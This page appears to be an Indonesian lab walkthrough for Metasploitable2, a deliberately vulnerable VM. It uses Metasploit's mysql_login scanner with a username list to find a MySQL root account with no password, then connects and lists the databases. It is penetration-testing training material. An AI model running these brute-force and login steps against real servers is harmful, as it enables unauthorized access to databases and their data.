Skip to content

Latest commit

 

History

History
79 lines (60 loc) · 2.32 KB

Exploit Port 3306 MySQL.md

File metadata and controls

79 lines (60 loc) · 2.32 KB

Exploit Port 3306 (MySQL)

  • Buat file dengan nano yang berisi daftar user untuk uji coba
nano user-metasploitable2.txt

alt text

  • Isi file tersebut dengan daftar user sebagai berikut. Kemudian tekan Ctrl+o lalu enter untuk menyimpan
root
admin
msfadmin
administrator
guest
user
test
postgres
oracle

alt text

  • Buka msfconsole di terminal
msfconsole

alt text

  • Cari modul untuk exploit MySQL
search mysql scanner

alt text

  • Gunakan modul auxiliary/scanner/mysql/mysql_login yang berada di nomor urut 5 dari hasil pencarian
use <nomor_modul>

alt text

  • Tampilkan daftar parameter yang dibutuhkan di modul tersebut
show options

alt text

  • Isi parameter yang dibutuhkan di modul tersebut
set rhosts <IP_metasploitable2>
set user_file /home/kali/user-metasploitable2.txt

alt text

  • Setelah pengisian parameter selesai jalankan modul tersebut. Disini didapat akses ke MySQL tanpa password dengan menggunakan user root
exploit

alt text

  • Lakukan uji coba koneksi ke MySQL dengan user root. Ternyata disini kita berhasil masuk tanpa dimintai password
mysql -u root -h <IP_metasploitable2>

alt text

  • Lihat semua database yang terdapat di MySQL Server
show databases;

alt text